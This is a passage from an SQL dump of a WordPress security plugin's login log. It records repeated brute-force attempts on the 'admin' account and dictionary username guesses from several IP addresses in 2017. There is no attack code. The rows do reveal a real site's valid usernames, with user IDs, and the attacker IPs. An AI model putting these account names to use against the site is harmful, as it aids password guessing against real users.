(100758, 1496462075.199130, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100757, 1496462074.890084, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100756, 1496462074.520495, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100755, 1496462074.212372, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100754, 1496462073.902833, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100753, 1496462073.593517, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100752, 1496462073.285221, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100751, 1496462072.975210, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100750, 1496462072.666759, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100749, 1496462072.358051, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100748, 1496462071.979827, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100747, 1496432811.773988, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100746, 1496432811.464779, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100745, 1496432811.155271, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100744, 1496432810.845186, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100743, 1496432810.534781, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100742, 1496432810.226287, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100741, 1496432809.915852, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100740, 1496432809.606307, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100739, 1496432809.297864, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100738, 1496432808.988836, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100737, 1496432808.679493, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100736, 1496432808.371700, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100735, 1496432808.062824, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100734, 1496432807.753557, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100733, 1496432807.443833, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100732, 1496432807.134563, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100731, 1496432806.825335, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100730, 1496432806.517229, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100729, 1496432806.163926, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100728, 1496396648.796012, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100727, 1496396648.483872, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100726, 1496396648.174584, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100725, 1496396647.862200, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100724, 1496396647.552974, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100723, 1496396647.244073, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100722, 1496396646.934749, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100721, 1496396646.625260, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100720, 1496396646.316859, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100719, 1496396645.993713, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100718, 1496396645.683696, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100717, 1496396645.373822, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100716, 1496396645.060440, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100715, 1496396644.750953, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100714, 1496396644.425228, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100713, 1496396644.101550, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100712, 1496396643.778446, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100711, 1496396643.468371, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100710, 1496396643.047630, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100709, 1496355424.488271, 1, 'loginFailValidUsername', 'admin', 1, 1266634707, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100708, 1496355071.622227, 1, 'loginFailInvalidUsername', 'notre', 0, 1707700163, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100707, 1496350966.848706, 1, 'loginFailInvalidUsername', 'outils', 0, 788319630, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100706, 1496350250.966212, 1, 'loginFailInvalidUsername', 'venez', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100705, 1496350248.354486, 1, 'loginFailInvalidUsername', 'objectifs', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100704, 1496350244.594680, 1, 'loginFailInvalidUsername', 'cross', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100703, 1496350242.006426, 1, 'loginFailInvalidUsername', 'pour', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100702, 1496350238.561486, 1, 'loginFailInvalidUsername', 'notre', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100701, 1496350230.507211, 1, 'loginFailInvalidUsername', 'training', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100700, 1496350227.678743, 1, 'loginFailInvalidUsername', 'vous', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100699, 1496350222.329087, 1, 'loginFailValidUsername', 'pablo', 3, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100698, 1496350219.730725, 1, 'loginFailValidUsername', 'julie', 2, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100697, 1496350214.294379, 1, 'loginFailValidUsername', 'admin', 1, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100696, 1496349209.836204, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/532.85.32 (KHTML, like Gecko) Version/5.3.7 Safari/530.77'),
(100695, 1496328706.651917, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539837019, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.99.46 (KHTML, like Gecko) Version/5.4.8 Safari/531.81'),
(100694, 1496260453.603266, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100693, 1496260453.294096, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100692, 1496260452.985383, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100691, 1496260452.676902, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100690, 1496260452.368462, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100689, 1496260452.059954, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100688, 1496260451.739649, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100687, 1496260451.426921, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100686, 1496260451.118690, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100685, 1496260450.808755, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100684, 1496260450.499887, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100683, 1496260450.190092, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100682, 1496260449.876575, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100681, 1496260449.565235, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100680, 1496260449.256200, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100679, 1496260448.946152, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100678, 1496260448.635646, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100677, 1496260448.322949, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100676, 1496260447.998301, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100675, 1496240906.362396, 1, 'loginFailInvalidUsername', 'wpupdatestream', 0, 1539837019, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.57.10) Gecko/20169991 Firefox/52.57.10'),
(100674, 1496238067.214510, 1, 'loginFailInvalidUsername', 'center', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100673, 1496238065.192649, 1, 'loginFailInvalidUsername', 'namur', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100672, 1496238063.185702, 1, 'loginFailInvalidUsername', 'travail', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100671, 1496238061.029574, 1, 'loginFailInvalidUsername', 'professionnel', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100670, 1496238059.072825, 1, 'loginFailInvalidUsername', 'outils', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100669, 1496238056.983586, 1, 'loginFailInvalidUsername', 'venez', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100668, 1496238054.979589, 1, 'loginFailInvalidUsername', 'objectifs', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100667, 1496238052.996167, 1, 'loginFailInvalidUsername', 'cross', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100666, 1496238051.030138, 1, 'loginFailInvalidUsername', 'pour', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100665, 1496238047.067476, 1, 'loginFailInvalidUsername', 'notre', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100664, 1496237821.172664, 1, 'loginFailInvalidUsername', 'outils', 0, 3163163411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100663, 1496237547.076690, 1, 'loginFailInvalidUsername', 'venez', 0, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100662, 1496237544.631965, 1, 'loginFailInvalidUsername', 'objectifs', 0, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100661, 1496237542.528702, 1, 'loginFailInvalidUsername', 'cross', 0, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100660, 1496237540.290003, 1, 'loginFailInvalidUsername', 'pour', 0, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100659, 1496237538.206345, 1, 'loginFailInvalidUsername', 'notre', 0, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100658, 1496237536.073866, 1, 'loginFailInvalidUsername', 'training', 0, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100657, 1496237533.987473, 1, 'loginFailInvalidUsername', 'vous', 0, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100656, 1496237531.887651, 1, 'loginFailValidUsername', 'pablo', 3, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100655, 1496237529.735046, 1, 'loginFailValidUsername', 'julie', 2, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100654, 1496237526.786249, 1, 'loginFailValidUsername', 'admin', 1, 842969491, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100653, 1496230080.586129, 1, 'loginFailValidUsername', 'admin', 1, 2978476462, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100652, 1496223939.029169, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100651, 1496223938.717701, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100650, 1496223938.407953, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100649, 1496223938.098361, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100648, 1496223937.787855, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100647, 1496223937.478662, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(100646, 1496223937.166054, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100645, 1496223936.855833, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100644, 1496223936.545716, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100643, 1496223936.231913, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100642, 1496223935.922821, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100641, 1496223935.613341, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100640, 1496223935.303858, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100639, 1496223934.994223, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100638, 1496223934.684338, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100637, 1496223934.371963, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100636, 1496223934.060191, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100635, 1496223933.750088, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100634, 1496223933.410159, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100633, 1496173926.383103, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100632, 1496173926.070730, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100631, 1496173925.758901, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100630, 1496173925.438784, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100629, 1496173925.130036, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100628, 1496173924.815917, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100627, 1496173924.501441, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100626, 1496173924.192151, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100625, 1496173923.879512, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100624, 1496173923.568412, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100623, 1496173923.258438, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100622, 1496173922.942459, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100621, 1496173922.629733, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100620, 1496173922.319302, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100619, 1496173922.008320, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100618, 1496173921.695776, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100617, 1496173921.385962, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100616, 1496173921.075427, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100615, 1496173920.758551, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100614, 1496125580.761098, 1, 'loginFailInvalidUsername', 'notre', 0, 2734175325, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100613, 1496125251.112699, 1, 'loginFailInvalidUsername', 'outils', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
